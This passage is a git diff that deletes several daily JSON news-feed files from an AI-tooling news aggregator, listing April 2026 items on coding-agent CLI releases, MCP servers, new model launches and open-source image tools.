"https://github.com/QwenLM/qwen-code/releases/tag/v0.15.1", - "source": "GitHub Releases · Qwen Code", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.62, - "date": "2026-04-23T03:57:40.000Z", - "summary": "## What's Changed\n* fix(core): scope StreamingToolCallParser per stream, not per Converter (#3516) by @zhangxy-zju in https://github.com/QwenLM/qwen-code/pull/3525\n* feat(cli): combine elapsed + timeout in shell time indicator by @wenshao in https://github.com/QwenLM/qwen-code/pull/3512\n* fix(cli): stop slash completion render loop by @LaZzyMan in https://github.com/QwenLM/qwen-code/pull/3533\n* chore: bump version to 0.15.1 by @LaZzyMan in https://github.com/QwenLM/qwen-code/pull/3541\n\n\n**Full C", - "category": "ai_tools" - }, - { - "title": "Last week in Generative Image & Video", - "url": "https://reddit.com/r/StableDiffusion/comments/1st8aux/last_week_in_generative_image_video/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.54, - "date": "2026-04-23T04:19:34.000Z", - "summary": "I curate a weekly multimodal AI roundup, here are the open-source image & video highlights from the last week:\n\n* Motif-Video 2B\n * Open-source 2B DiT, 720p at 121 frames, one checkpoint for both T2V and I2V.\n * 83.76% on VBench Total, highest among open-source, beats Wan2.1-14B at 7x fewer parameters. Caveat: Wan2.1-14B still wins on temporal stability and fine human anatomy in blind tests.\n * [Hugging Face](https://huggingface.co/Motif-Technologies/Motif-Video-2B)\n\nhttps://reddit.com", - "category": "creative_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-25.json b/data/news-feed-2026-04-25.json deleted file mode 100644 index c493ecb..0000000 --- a/data/news-feed-2026-04-25.json +++ /dev/null @@ -1,249 +0,0 @@ -{ - "generated": "2026-06-05T00:44:36.117Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-25", - "article_count": 15, - "archived_story_count": 689, - "articles": [ - { - "title": "Stop switching tabs for prompting. I built a local MCP bridge to orchestrate Gemini 3.1 and Claude while you diffuse", - "url": "https://reddit.com/r/StableDiffusion/comments/1svmskn/stop_switching_tabs_for_prompting_i_built_a_local/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-04-25T20:20:33.000Z", - "summary": "If you’re like me, your workflow is basically: generating an image in ComfyUI, realizing the prompt needs better structure, switching to Claude/Gemini for brainstorming, then copy-pasting back and forth. It’s a flow-killer, especially when you’re deep into a creative session.\n\nI built [**Proxima**](https://github.com/Zen4-bit/Proxima) to handle this. It’s an open-source MCP bridge that lets you bring the logic of Claude, Gemini, GPT, and Perplexity directly into your local environment. Instead o", - "category": "creative_tools" - }, - { - "title": "Signal Loom — node-based AI media studio with a built-in timeline editor (open source, AGPL)", - "url": "https://reddit.com/r/StableDiffusion/comments/1sv0ilf/signal_loom_nodebased_ai_media_studio_with_a/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-04-25T03:09:10.000Z", - "summary": "I built Signal Loom because I was tired of generating assets in one tool and then exporting/importing into another just to edit them. It's a node-based workflow canvas (React Flow) for chaining generative AI tasks—text, image, video, audio—connected to your own API keys (Gemini, OpenAI, ElevenLabs, Hugging Face). Downstream nodes automatically consume upstream context. When you're done generating, you switch to a timeline editor: multi-track, keyframes, cuts, opacity, transform, volume, text ove", - "category": "creative_tools" - }, - { - "title": "Qwen Code v0.15.2 released", - "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.2", - "source": "GitHub Releases · Qwen Code", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-04-24T12:11:44.000Z", - "summary": "## What's Changed\n* fix(core): treat empty 'pages' parameter as unset in ReadFile by @zhangxy-zju in https://github.com/QwenLM/qwen-code/pull/3559\n* feat(session): auto-title sessions via fast model, add /rename --auto by @wenshao in https://github.com/QwenLM/qwen-code/pull/3540\n* fix(i18n): sync mismatched keys between en.js and zh.js by @doudouOUC in https://github.com/QwenLM/qwen-code/pull/3534\n* fix(cli): remove residual blank lines after MCP init completes by @BZ-D in https://github.com/Qwe", - "category": "ai_tools" - }, - { - "title": "Built an agent-to-agent payment system with Claude — here's what I learned and why I think agents need their own economy (e.g., pet food)", - "url": "https://reddit.com/r/ClaudeAI/comments/1svgba2/built_an_agenttoagent_payment_system_with_claude/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "agent_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-04-25T16:11:53.000Z", - "summary": "I built Coyns with Claude over the past several months. It's a virtual currency system designed specifically for AI agent-to-agent transactions — MCP-native, Ed25519-authenticated, with a wallet, payment rails, escrow deals, and a gaming layer (Playce.ai) where agents wager and compete. \n \nAgents can register and start earning free Gold — the base currency agents earn through activity — with no purchase required. The beta is open now and free to join at coyns.com. \n \nWhat Claude helped me bu", - "category": "ai_tools" - }, - { - "title": "Gemini CLI v0.39.1 released", - "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.39.1", - "source": "GitHub Releases · Gemini CLI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.7, - "date": "2026-04-24T02:11:26.000Z", - "summary": "**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.39.0...v0.39.1", - "category": "ai_tools" - }, - { - "title": "Claude estimates work in human time, not Claude time", - "url": "https://reddit.com/r/ClaudeAI/comments/1sv8avi/claude_estimates_work_in_human_time_not_claude/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.62, - "date": "2026-04-25T10:15:12.000Z", - "summary": "Whenever I ask Claude to plan a chunk of work, it comes back with wildly long timelines. For example, adding a feature to a CLI framework I'm working on got estimated at **1-2 days**, but in reality, Claude Code one-shots it in a few minutes.\n\nSometimes it even estimates weeks or months for more complex work, and Claude Code is able to complete it (with my input and guidance) in a few hours.\n\nI get it's probably because it was trained on estimates made by humans, but that feels weird and it alwa", - "category": "ai_tools" - }, - { - "title": "Crush v0.62.1 released", - "url": "https://github.com/charmbracelet/crush/releases/tag/v0.62.1", - "source": "GitHub Releases · Crush", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 0.62, - "date": "2026-04-24T20:28:22.000Z", - "summary": "# Stability release\r\n\r\nOpen Source :tm: is all about community, and this release got some nice contributions from our loved users!\r\n\r\n## MiniMax fix\r\n\r\nCrush wasn't allowing users to _some_ MiniMax API keys, but now all keys should work.\r\n\r\nFor context, MiniMax does not have an endpoint to validate API keys. We were checking they at least start with `sk-`, but not all keys from MiniMax have this prefix.\r\n\r\nKudos to @flynn-eye for the help with this one!\r\n\r\n## Fantasy fix\r\n\r\n@carsonfarmer made [", - "category": "ai_tools" - }, - { - "title": "Andrej Karpathy's 262-Minute Masterclass on AI Agents Is the Weekend Watch You Need", - "url": "https://x.com/karpathy", - "source": "Aligned News (Scoble)", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-04-25T10:55:04.004Z", - "summary": "Andrej Karpathy's 262-minute YouTube masterclass on AI agents, Claude Skills, and MCP servers is being called essential viewing for anyone building with AI tools.", - "category": "ai_tools" - }, - { - "title": "AI Agent Team Finds Drugs Targeting Cell-Type-Specific Genes Are 40% More Likely to Succeed", - "url": "https://x.com/ayirpelle/status/2029840518272975205", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-25T10:50:43.717Z", - "summary": "A team of AI agents discovered that drugs targeting cell-type-specific genes are 40% more likely to succeed in clinical development, providing a new principle for drug target prioritization.", - "category": "ai_tools" - }, - { - "title": "GPT-5.5 Is Now in the API — 38.4% on APEX-Agents vs 1.1% Two Years Ago", - "url": "https://x.com/mercor_ai/status/2047859197593911522", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-25T03:59:20.673Z", - "summary": "GPT-5.5 hits the API with APEX-Agents benchmark jumping from 1.1% (GPT-4o) to 38.4%, representing 35+ points of improvement in under two years.", - "category": "ai_tools" - }, - { - "title": "ComfyUI Raises $30M at $500M Valuation — Open Source Wins Again", - "url": "https://x.com/GrishinRobotics/status/2047760472204546230", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-25T03:59:20.673Z", - "summary": "ComfyUI raises $30M at $500M valuation, validating open source AI creative tools as serious infrastructure worth funding at startup scale.", - "category": "ai_tools" - }, - { - "title": "Sakana AI Launches Fugu — Multi-Agent Orchestration Is the Next Platform War", - "url": "https://x.com/SakanaAILabs/status/2047849392808624332", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-25T03:59:20.673Z", - "summary": "Sakana AI launches Fugu beta for multi-agent orchestration, betting that collective intelligence AI will define the next platform war.", - "category": "ai_tools" - }, - { - "title": "@Scobleizer Grok Can't Read X Lists — His AI Can, Key Capability Gap", - "url": "https://x.com/Scobleizer/status/2047736381162901665", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-25T03:58:07.384Z", - "summary": "Scoble notes Grok can't read X lists while his AI can, highlighting that platform integration is as important as raw model capability for practical AI utility.", - "category": "ai_tools" - }, - { - "title": "@NousResearch Hermes Agent AMA on r/LocalLLaMA — April 29, Direct Competition with OpenClaw", - "url": "https://x.com/NousResearch/status/2047840294406627659", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-25T03:57:02.129Z", - "summary": "Nous Research announces a Hermes Agent AMA on r/LocalLLaMA for April 29, 8-11am PST, with strong community interest in the OpenClaw competitor.", - "category": "ai_tools" - }, - { - "title": "@jxnlco Codex Computer Use Completes Full Financial Workflow — Signs PDF, Submits to Schwab", - "url": "https://x.com/jxnlco/status/2047874586310766864", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-25T03:57:02.129Z", - "summary": "Codex Computer Use completes a full financial workflow autonomously, signing a PDF with Dropbox Sign and submitting to Schwab, raising the bar for AI agent platforms.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-26.json b/data/news-feed-2026-04-26.json deleted file mode 100644 index 6f5f95c..0000000 --- a/data/news-feed-2026-04-26.json +++ /dev/null @@ -1,265 +0,0 @@ -{ - "generated": "2026-06-05T00:44:36.305Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-26", - "article_count": 15, - "archived_story_count": 311, - "articles": [ - { - "title": "I built a free package manager for Claude Code MCP servers (open source)", - "url": "https://reddit.com/r/ClaudeAI/comments/1sw77bg/i_built_a_free_package_manager_for_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "open_source", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source", - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-26T13:12:55.000Z", - "summary": "**What I built** \n \nEvery time I wanted to add an MCP server to Claude Code I was doing the same thing: find the npm package, figure out the config format, manually edit \\`\\~/.claude.json\\`, restart. So I built **cgcone** to make it one command.\n\n \n`npm install -g @cgcone``/cli` \n`cgcone install context7` \n`cgcone install brave-search` \n\n\nThat's it. It detects Claude Code, writes the config, and prompts for any API keys with masked input — no manual JSON editing. \n \n \n**How Claude Code ", - "category": "ai_tools" - }, - { - "title": "GPT-5.5 launched — OpenAI's biggest agentic model yet is live in ChatGPT and Codex", - "url": "https://x.com/OpenAIDevs/status/2047377292981383662", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-26T18:08:49.116Z", - "summary": "GPT-5.5 launched this week and OpenAI called it a step change. It is now live in ChatGPT, Codex, and the API, optimized for agentic coding and multi-step tasks.", - "category": "ai_tools" - }, - { - "title": "I built an MCP server (with Claude Code) that tells you the blast radius of a code change, its free, open source, and open to feedback", - "url": "https://reddit.com/r/ClaudeAI/comments/1sw4dqr/i_built_an_mcp_server_with_claude_code_that_tells/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "open_source" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-04-26T10:53:09.000Z", - "summary": "I built **Impact Graph MCP** using Claude Code. It’s an MCP server that does AST-based impact analysis for TypeScript codebases, so Claude can tell you things like *“if I rewrite* `loginUser`*, what else breaks?”*\n\n**What it does:** \nYou give it a function name, file path, or module, and it returns:\n\n* Direct and indirect dependents\n* Risk score (0–100) and risk factors\n* Which system layers are affected (API, auth, frontend, etc.)\n* Decision-oriented guidance: recommended strategy, suggested t", - "category": "ai_tools" - }, - { - "title": "DeepSeek V4 Pro is the #1 open weights model — open source is not losing the AI race", - "url": "https://x.com/ArtificialAnlys/status/2047547434809880611", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-04-26T18:08:49.116Z", - "summary": "DeepSeek V4 Pro launched this week and immediately became the number one open weights model on the GDPval-AA agentic benchmark. Open source is not losing the AI race.", - "category": "ai_tools" - }, - { - "title": "Thrilled to co-facilitate a #BuildwithAI Goma tech session with @RomanaMedi We explored prompt chaining for fullstack prototyping in Google AI Studio and Agentic Coding in Antigravity, including Rules, Skills & MCP for adapting AI to proje…", - "url": "https://x.com/AmaniBisimwa4/status/2048370790333046822", - "source": "X / @amanibisimwa4", - "tags": [ - "mcp", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-26T11:57:07.000Z", - "summary": "Thrilled to co-facilitate a #BuildwithAI Goma tech session with @RomanaMedi We explored prompt chaining for fullstack prototyping in Google AI Studio and Agentic Coding in Antigravity, including Rules, Skills & MCP for adapting AI to project context. Thanks to everyone who joined", - "category": "ai_tools" - }, - { - "title": "Built an Open Source Tool that reduces token usage by ~94% for initial context building for Coding Agents.", - "url": "https://reddit.com/r/ClaudeAI/comments/1swbkvk/built_an_open_source_tool_that_reduces_token/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 0.86, - "date": "2026-04-26T16:06:42.000Z", - "summary": "I've been using claude code daily and kept hitting the same wall,\n\nit would spend the first few messages just re-exploring ,my codebase. files it had already seen. every. single. session.\n\nI measured it one day , 27,292 tokens before it wrote a single line of code, \n\n\n\nso I built **Fullerenes**\n\n`npx fullerenes init` \n\nmaps your codebase into a local \n\nsqlite graph. agents query it over MCP instead of reading raw files from scratch.\n\n\n\n27,292 → 919 tokens. same understanding.\n\nIt has several oth", - "category": "ai_tools" - }, - { - "title": "GPT-5.5 is now available in the API.\n\nThe model brings higher intelligence and stronger token efficiency to complex work, helping tasks get done with fewer retries.", - "url": "https://x.com/OpenAIDevs/status/2047742566410736090", - "source": "X / @openaidevs", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 0.86, - "date": "2026-04-24T18:20:47.000Z", - "summary": "GPT-5.5 is now available in the API.\n\nThe model brings higher intelligence and stronger token efficiency to complex work, helping tasks get done with fewer retries.", - "category": "ai_tools" - }, - { - "title": "huggingface/ml-intern: 🤗 ml-intern: an open-source ML engineer that reads papers, trains models, and ships ML models", - "url": "https://reddit.com/r/StableDiffusion/comments/1swctgr/huggingfacemlintern_mlintern_an_opensource_ml/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 0.78, - "date": "2026-04-26T16:52:22.000Z", - "summary": "This looks interesting. \n\nThis is a quick summary according to Gemini:\n\n\"Think of ML Intern as a \"junior machine learning engineer\" that lives inside your computer.\n\nWhile a standard AI (like ChatGPT) can give you advice or write a small snippet of code, ML Intern actually does the work from start to finish. It’s an \"agent,\" meaning it doesn't just talk; it takes action.\n\nWhat it actually does for you:\n\nReads the \"Homework\": If you tell it to use a new technique from a scientific paper, it will ", - "category": "creative_tools" - }, - { - "title": "Cloudflare just shipped enterprise MCP governance, is this where the industry is heading or does nobody care", - "url": "https://reddit.com/r/ClaudeAI/comments/1sw4zmj/cloudflare_just_shipped_enterprise_mcp_governance/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 0.78, - "date": "2026-04-26T11:25:25.000Z", - "summary": "Cloudflare wrapped Agents Week last week. The enterprise MCP stuff caught my eye. They shipped MCP server portals that aggregate multiple upstream servers behind Cloudflare Access auth. Code Mode collapses thousands of API endpoints into two tools (search and execute) running in a sandboxed Worker, dropping context costs by 99.9%. AI Gateway sits between MCP clients and model providers for usage tracking. Shadow MCP detection got added to Cloudflare Gateway as a category to watch.\n\nWhat I can't ", - "category": "ai_tools" - }, - { - "title": "Most image managers suck for AI. I built AURA: A local-first Vault for 'AI Hoarders' with Civitai integration, Vision Tagging, Aesthetic Grading, and more!", - "url": "https://reddit.com/r/StableDiffusion/comments/1swck8j/most_image_managers_suck_for_ai_i_built_aura_a/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 0.7, - "date": "2026-04-26T16:42:44.000Z", - "summary": "**GitHub Link (Free & Open Source):** [https://github.com/TheGho7t/AURA-AI-Studio-Vault](https://github.com/TheGho7t/AURA-AI-Studio-Vault)\n\nBe sure to check out all of the other details and images on the GitHub page.\n\nHey everyone. As a self-proclaimed AI hoarder, I was tired of losing my prompts and forgetting what my LoRAs even did. Existing image managers didn't quite do what I needed, so I built **AURA** **AI Studio Vault**.\n\nA few things it does:\n\n* **One-Click Import:** Use the include", - "category": "creative_tools" - }, - { - "title": "OpenClaw vs Hermes — the agent framework war is the most important battle in AI tooling right now", - "url": "https://x.com/LoicBerthelot/status/2047690512199540959", - "source": "Aligned News (Scoble)", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-26T18:08:49.116Z", - "summary": "The battle between OpenClaw (345K+ GitHub stars) and Hermes (100K stars in 7 weeks) is the most important competition in AI tooling. Hermes wins on learning and memory. OpenClaw wins on adoption. Mercury is trying to combine both.", - "category": "ai_tools" - }, - { - "title": "AI agent burnout is real — what it means for careers in an AI-augmented workplace", - "url": "https://x.com/Chengdavid923/status/2048451643298218069", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-26T18:07:23.972Z", - "summary": "The emerging phenomenon of AI agent burnout among young ambitious workers has implications for how companies should structure AI-augmented work and what sustainable AI-human collaboration looks like.", - "category": "ai_tools" - }, - { - "title": "GenX Pro v1.6.6 - released 04/26/2026 New Daily Shorts Workflow (pick models, pay less) Voice Remix — Design Unique Voices GenX LM Voice V1 — Native Voice Cloning New MCP capabilities (69 tools in total). Watch the release preview: https:/…", - "url": "https://x.com/genxproapp/status/2048454195716497743", - "source": "X / @genxproapp", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-04-26T17:28:33.000Z", - "summary": "GenX Pro v1.6.6 - released 04/26/2026 New Daily Shorts Workflow (pick models, pay less) Voice Remix — Design Unique Voices GenX LM Voice V1 — Native Voice Cloning New MCP capabilities (69 tools in total). Watch the release preview: https:// genx.pro/latest One app.", - "category": "ai_tools" - }, - { - "title": "Why this matters: DeepSeek released preview access to V4-Pro, a 1.6-trillion-parameter MoE model with a genuine one-million-token context window that matches GPT-5 and Gemini 3.0 Pro on key bench... We wrote it up:", - "url": "https://x.com/FSEvolved/status/2048447077705830600", - "source": "X / @fsevolved", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-26T17:00:16.000Z", - "summary": "Why this matters: DeepSeek released preview access to V4-Pro, a 1.6-trillion-parameter MoE model with a genuine one-million-token context window that matches GPT-5 and Gemini 3.0 Pro on key bench... We wrote it up:", - "category": "ai_tools" - }, - { - "title": "United Imaging Intelligence has released uAI NEXUS MedVLM, an open-source LLM for medical video analysis. The model claims to significantly outperform general-purpose models like GPT-5.4 and Gemini 3.1 in surgical safety and clinical repor…", - "url": "https://x.com/H_Mhatre_/status/2048359364902170792", - "source": "X / @h_mhatre_", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-26T11:11:43.000Z", - "summary": "United Imaging Intelligence has released uAI NEXUS MedVLM, an open-source LLM for medical video analysis. The model claims to significantly outperform general-purpose models like GPT-5.4 and Gemini 3.1 in surgical safety and clinical reporting benchmarks.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-27.json b/data/news-feed-2026-04-27.json deleted file mode 100644 index 5e78c69..0000000 --- a/data/news-feed-2026-04-27.json +++ /dev/null @@ -1,263 +0,0 @@ -{ - "generated": "2026-06-05T00:44:36.433Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-27", - "article_count": 15, - "archived_story_count": 683, - "articles": [ - { - "title": "(Open Source) AURA: A Local-First Management Vault for Civitai - Auto-tagging, Metadata and Browser Integration - Version 1.0.1 Fixes", - "url": "https://reddit.com/r/StableDiffusion/comments/1sx98ch/open_source_aura_a_localfirst_management_vault/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "open_source", - "github_release", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "open_source", - "github_release", - "tool_update" - ], - "importance": 0.9400000000000001, - "date": "2026-04-27T16:44:43.000Z", - "summary": "**GitHub Link:** [**https://github.com/TheGho7t/AURA-AI-Studio-Vault**](https://github.com/TheGho7t/AURA-AI-Studio-Vault)\n\n**Latest Release:** [**https://github.com/TheGho7t/AURA-AI-Studio-Vault/releases/tag/AURAv1.0.1**](https://github.com/TheGho7t/AURA-AI-Studio-Vault/releases/tag/AURAv1.0.1)\n\nI resolved an obvious mistake causing images and models not to be rated General by default. I also fixed an issue regarding what type of model (Lora, Checkpoint, Dora, etc...) being displayed. It had bee", - "category": "creative_tools" - }, - { - "title": "Qwen 3.6 Max Preview just dropped on OpenRouter. One trillion parameters. Released today. $1.30/$7.80 per million tokens. 262K context. Sparse mixture-of-experts. Optimized for agentic coding and tool use. No open weights. Alibaba's bigges…", - "url": "https://x.com/bridgemindai/status/2048816878454194460", - "source": "X / @bridgemindai", - "tags": [ - "api_update", - "open_source", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-27T17:29:43.000Z", - "summary": "Qwen 3.6 Max Preview just dropped on OpenRouter. One trillion parameters. Released today. $1.30/$7.80 per million tokens. 262K context. Sparse mixture-of-experts. Optimized for agentic coding and tool use. No open weights. Alibaba's biggest model ever. And it costs less", - "category": "ai_tools" - }, - { - "title": "A quick guide to add @SurfAI MCP to claude 1-Get your API key from Surf dashboard 2-Claim free credits 3-Run in terminal (Replace your api key) : claude mcp add surf -e SURF_API_KEY=YOUR_API_KEY -- npx -y @surf -ai/surf-mcp 5-Verify: claud…", - "url": "https://x.com/0xAirr/status/2048663698806620544", - "source": "X / @0xairr", - "tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-27T07:21:02.000Z", - "summary": "A quick guide to add @SurfAI MCP to claude 1-Get your API key from Surf dashboard 2-Claim free credits 3-Run in terminal (Replace your api key) : claude mcp add surf -e SURF_API_KEY=YOUR_API_KEY -- npx -y @surf -ai/surf-mcp 5-Verify: claude mcp list You should see Surf MCP", - "category": "ai_tools" - }, - { - "title": "how to build a persistent memory layer like recall?", - "url": "https://reddit.com/r/ClaudeAI/comments/1swyzvc/how_to_build_a_persistent_memory_layer_like_recall/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-04-27T09:50:01.000Z", - "summary": "I've been testing recall 2.0 and their context layer is exactly what i want. it sits outside the chat, ingests all my github repos and web research, and then feeds the exact right context into claude when i ask a question. i want to build my own version of this using the mcp protocol so i don't have to pay for another subscription. what's the best vector database and orchestration setup to replicate this? my current python script just dumps way too much junk into the context window and confuse", - "category": "ai_tools" - }, - { - "title": "it’s been a good run... rip my stable diffusion setup (+ Raven fanart)", - "url": "https://reddit.com/r/StableDiffusion/comments/1sx30ke/its_been_a_good_run_rip_my_stable_diffusion_setup/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 0.9400000000000001, - "date": "2026-04-27T13:01:33.000Z", - "summary": "i've been a stable diffusion user since march 2023, but sadly my journey ended last june 2025. it's been a struggle since python got updated in sagemaker and the api i was renting got way too greedy, they even removed the free features for http tunneling services.\n\non top of that, kaggle keeps banning my accounts if you try to generate any woman pictures, and google colab basically moved everything behind the pro version. it's getting harder and harder to find a good spot to build.\n\nanyway, i wa", - "category": "creative_tools" - }, - { - "title": "Built an MCP connector for official Python docs .. no API keys, no unofficial sources", - "url": "https://reddit.com/r/ClaudeAI/comments/1sx2u3s/built_an_mcp_connector_for_official_python_docs/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 0.8600000000000001, - "date": "2026-04-27T12:54:43.000Z", - "summary": "I built an MCP server for Python stdlib docs with one goal: make it easy to defend in a company environment.\n\n[https://github.com/ayhammouda/python-docs-mcp-server](https://github.com/ayhammouda/python-docs-mcp-server)\n\nThe core idea is simple. Instead of going through third-party APIs or unofficial doc sources, it connects MCP clients to the official Python docs.\n\nI built it because this is where good tooling usually gets stuck. In a solo setup, everything looks fine. In a company, security and", - "category": "ai_tools" - }, - { - "title": "OpenClaw v2026.4.25 released", - "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.4.25", - "source": "GitHub Releases · OpenClaw", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.78, - "date": "2026-04-27T12:45:30.000Z", - "summary": "## 2026.4.25\n\n### Highlights\n\n- Voice replies get a full TTS upgrade: `/tts latest`, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. Thanks @leonchui, @zoujiejun, @solar2ain, @cshape, @xuruiray, @itsuzef, and @barronlroth.\n- Plugin startup and install paths move to the cold persisted registry, cutting broad manifest scans while making plugin update, repair, provider discov", - "category": "ai_tools" - }, - { - "title": "Built a open-source local music video generator using SDXL + AnimateDiff + audio-reactive GLSL shaders", - "url": "https://reddit.com/r/StableDiffusion/comments/1swx934/built_a_opensource_local_music_video_generator/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 0.78, - "date": "2026-04-27T08:04:41.000Z", - "summary": "I needed visuals for AI-generated tracks, so I built Glitchframe, a pipeline that takes an audio file and produces a full music video using SDXL keyframe stills or AnimateDiff motion, with GLSL shaders that react to beat/onset/spectrum data in real time.\n\nStack: SDXL for backgrounds, optional AnimateDiff (fair warning: \\~20 GB VRAM), Skia for kinetic typography, WhisperX for word-level lyric sync, FFmpeg NVENC for encode. UI runs in Gradio locally.\n\nAnimateDiff integration was the most painful p", - "category": "creative_tools" - }, - { - "title": "PixlStash 1.1.0 is now available!", - "url": "https://reddit.com/r/StableDiffusion/comments/1sx8khw/pixlstash_110_is_now_available/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 0.7, - "date": "2026-04-27T16:21:39.000Z", - "summary": "[PixlStash](https://pixlstash.dev) is a locally hosted, open source, picture management server for organising, filtering, tagging and reviewing large image collections.\n\nThe main target for version 1.1.0 was to support existing self-organised reference folders, so you can index, tag and include pictures from folders you've carefully organised yourself. But there are some more features as well:\n\n* Automatic import folders in the UI along with the reference folders\n* Statistics sidebar that shows ", - "category": "creative_tools" - }, - { - "title": "Is anyone working on a ComfyUI node for the new Ideogram LoRA API? (They call it Custom Model)", - "url": "https://reddit.com/r/StableDiffusion/comments/1sxh6ir/is_anyone_working_on_a_comfyui_node_for_the_new/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.62, - "date": "2026-04-27T21:21:20.000Z", - "summary": "I've been playing around with the new 